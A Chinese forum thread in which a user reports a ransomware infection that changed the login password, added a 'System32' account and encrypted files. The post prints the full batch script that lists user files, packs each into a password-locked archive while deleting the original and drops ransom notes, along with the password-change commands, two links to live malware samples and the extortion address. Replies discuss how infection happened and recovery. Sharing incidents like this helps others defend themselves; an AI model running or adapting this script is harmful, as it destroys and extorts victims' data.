【勒索病毒】早晨开机发现密码错了,再查发现多了一个System32用户,再查发现勒索病毒
今天早晨开机密码不对了,再查发现多了一个System32用户,进PE改密码进系统,在360杀毒的时候,再查发现勒索病毒的文件,360未报毒,关机进Ubuntu查看文件,只加密了几个文件(貌似),还在搜索。在我的Users/THHICV/Videos/Windows01目录下有:
```
C.batD.batE.batF.batREADME_WARNING.TXTupdate.exe
C.txtD.txtE.txtF.txtexclude.txt
```
C.bat貌似是用来生成索引文件的:
```
dir /b /s /a-d "C:\" 2>nul| findstr /ilv /c:"%ProgramFiles%" /c:"%windir%" /c:"%serprofile%\appdata" /c:"%ProgramData%" >C.txt
setlocal enabledelayedexpansion
set key=%1
set start="update.exe"
set fl=C.txt
for /f "delims=" %%i in (%fl%) do (
for /f "delims=" %%j in ("%%i") do (
%start% a -p%key% -inul -y -m0 -k -mt64 -ibck -ep -afzip -df -x@exclude.txt "%%~dpj\%%~nxj..id[%key:~-5%].lock" "%%i"
)
)
for /r "C:\Users" %%f in (.) do (
copy "README_WARNING.TXT" "%%~ff" > nul
)
DEL C.txt
del %0
exit
```
C.txt每一行就是一个文件。
以下是改密码的文件
net user %username% GKZCeSvuW2sD
taskkill /f /im wscript.exe
timeout /t 2
start window.vbs
exit shojnhv 发表于 2022-4-5 08:53
楼主一看就是技术帝,想知道你最近做了什么动作,浏览了什么网站等,才中招的,学习一下,避免也中招
不知道怎么中招的,头一天安装了一个wireshark,github找了几个python的爬虫跑了下,没有其他操作 病毒样本:https://wwm.lanzout.com/iQjt702lap3c
病毒样本:https://wwm.lanzout.com/iCdpz02lap2b
文件被加密为 多模态烟火监测系统.docx.[unlocker@onionmail.org].id.lock 楼主一看就是技术帝,想知道你最近做了什么动作,浏览了什么网站等,才中招的,学习一下,避免也中招 有点困难 学习了,感谢分享 请问楼主恢复文件了没?我昨天中招,症状几乎完全一样。。。 handianduo 发表于 2022-4-23 18:19
请问楼主恢复文件了没?我昨天中招,症状几乎完全一样。。。
未恢复,发现的及时,只加密了我回收站的8W个数据集文件和2个WORD文档,我直接删了,沙雕病毒 s1711880582 发表于 2022-4-26 15:05
未恢复,发现的及时,只加密了我回收站的8W个数据集文件和2个WORD文档,我直接删了,沙雕病毒
linux有啥安全措施吗?
页:
[1]
2